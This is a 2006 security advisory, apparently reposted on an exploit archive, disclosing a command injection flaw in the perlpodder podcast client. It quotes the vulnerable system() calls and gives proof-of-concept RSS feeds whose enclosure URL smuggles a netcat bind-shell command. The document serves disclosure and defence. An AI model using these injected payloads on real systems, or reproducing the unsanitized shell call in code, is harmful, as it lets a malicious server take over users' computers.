what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

rt-sa-2006-003.txt

rt-sa-2006-003.txt
Posted May 24, 2006
Authored by RedTeam Pentesting | Site redteam-pentesting.de

RedTeam identified a security flaw in perlpodder versions 0.4 and below which makes it possible for a malicious podcast server to execute arbitrary shell commands on the victim's client.

tags | exploit, arbitrary, shell
SHA-256 | d686ebd6d0f72001988dd595a3a938da6296bf4e8ed1a1d3da041456e3806d68

rt-sa-2006-003.txt

Change Mirror Download
Advisory: Perlpodder Remote Arbitrary Command Execution

RedTeam identified a security flaw in perlpodder which makes it possible
for a malicious podcast server to execute arbitrary shell commands on
the victim's client.


Details
=======

Product: perlpodder
Affected Versions: All versions up to perlpodder-0.4
Fixed Versions: perlpodder-0.5
Vulnerability Type: Remote arbitrary command execution
Security-Risk: high
Vendor-URL: http://perlpodder.sourceforge.net/
Vendor-Status: informed, fixed
Advisory-URL: http://www.redteam-pentesting.de/advisories/rt-sa-2006-003.txt
Advisory-Status: public
CVE: GENERIC-MAP-NOMATCH
CVE-URL: http://cve.mitre.org/cgi-bin/cvename.cgi?name=GENERIC-MAP-NOMATCH


Introduction
============

Perlpodder is a podcatcher script written in perl. It automates
downloading podcasts.

(from perlpodder SourceForge page)

Podcasting is the distribution of multimedia files over the internet.
Normally, a server is providing an RSS or Atom XML feed describing where
to get the multimedia files. The client parses the feed and may then
download the desired files.


More Details
============

When perlpodder is used to fetch a podcast, perlpodder will extract the
URL of the audio-file from the XML-file the server provides. The URLs
are saved in the variable "$dlset". There are two occasions in the code
where this variable will be used together with the system() command:

The first usage is with "echo" to log the URL (line 278):

[...]
277 # add urls to log file to mark as retrieved
278 $addurl = "echo " . $dlset . " >> $log_path ";
279 system $addurl;
[...]

The second usage is with "wget" to actually fetch the audio file (line
294):

[...]
291 # Prepair to call wget
292
293 $wget_path = "$cwd". "$datadir" ;
294 $wget_cmd = "wget --quiet --background -o /dev/null -c --tries=2
--timeout=20 --random-wait " . $dlset . " -P ".
$wget_path ;
295
296 if ($DEBUG > 0) {
297
298 print "running " . $wget_cmd . "\n" ;
299
300 }
301
302 system $wget_cmd;
[...]

Unfortunately, $dlset is never properly sanitized, so it is possible for
the remote server to include arbitrary shell commands in the URL which
will then be executed using system() (lines 279 and 302).


Proof of Concept
================

A minimal malicious server rss feed which exploits the "echo" call may
look as follows:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting Example Malicious Server Feed</title>

<item>
<enclosure url="http://www.example.com/example.mp3 >> /dev/null; nc
-e /bin/sh -l -p 1337 &#"
length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>

The URL above will open port 1337 via netcat on the victim's computer
and bind a shell to it. This is just one example of how to exploit the
vulnerability, as arbitrary commands can be included in the URL, but it
should illustrate the point.

To exploit the "wget" call, the URL just has to be minimally adjusted:

<?xml version="1.0" encoding="UTF-8"?>
<?xml-stylesheet type="text/xsl"?>
<rss version="2.0">
<channel>
<title>RedTeam Pentesting</title>

<item>
<enclosure url="http://www.example.com/example.mp3; nc -e /bin/sh -l
-p 1337 &#"
length="241734" type="audio/mpeg" />
</item>
</channel>
</rss>


Workaround
==========

Do not use perlpodder with untrusted servers.


Fix
===

Upgrade to perlpodder-0.5 immediately[1].


Security Risk
=============

High, because arbitrary shell commands can be executed on the victim's
computer with the privileges of perlpodder (normally the user's
privileges).


History
=======

2006-05-19 Discovery of the problem
2006-05-19 Notification of the author
2006-05-21 Fixed version of perlpodder is released
2006-05-22 Email from author pointing out the release
2006-05-22 Public release of the advisory without CVE
number because of public release by the
author. CVE will be appended when available.



References
==========

[1]
http://prdownloads.sourceforge.net/perlpodder/perlpodder-0.5.tar.gz?download


RedTeam
=======

RedTeam Pentesting is offering individual penetration tests, short
pentests, performed by a team of specialised IT-security experts.
Hereby, security weaknesses in company networks are uncovered and can be
repaired immediately.

As there are only few experts in this field, RedTeam wants to share its
knowledge and enhance the public knowledge with research in security
related areas. The results are made available as public security
advisories.

More information about RedTeam can be found at
http://www.redteam-pentesting.de.

--
RedTeam Pentesting Tel.: +49-(0)241-963 1300
Dennewartstr. 25-27 Fax : +49-(0)241-963 1304
52068 Aachen http://www.redteam-pentesting.de
Login or Register to add favorites

File Archive:

November 2022

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Nov 1st
    16 Files
  • 2
    Nov 2nd
    17 Files
  • 3
    Nov 3rd
    17 Files
  • 4
    Nov 4th
    11 Files
  • 5
    Nov 5th
    0 Files
  • 6
    Nov 6th
    0 Files
  • 7
    Nov 7th
    3 Files
  • 8
    Nov 8th
    59 Files
  • 9
    Nov 9th
    12 Files
  • 10
    Nov 10th
    6 Files
  • 11
    Nov 11th
    11 Files
  • 12
    Nov 12th
    1 Files
  • 13
    Nov 13th
    0 Files
  • 14
    Nov 14th
    9 Files
  • 15
    Nov 15th
    33 Files
  • 16
    Nov 16th
    53 Files
  • 17
    Nov 17th
    11 Files
  • 18
    Nov 18th
    14 Files
  • 19
    Nov 19th
    0 Files
  • 20
    Nov 20th
    0 Files
  • 21
    Nov 21st
    26 Files
  • 22
    Nov 22nd
    22 Files
  • 23
    Nov 23rd
    10 Files
  • 24
    Nov 24th
    9 Files
  • 25
    Nov 25th
    11 Files
  • 26
    Nov 26th
    0 Files
  • 27
    Nov 27th
    0 Files
  • 28
    Nov 28th
    20 Files
  • 29
    Nov 29th
    0 Files
  • 30
    Nov 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Hosting By
Rokasec
close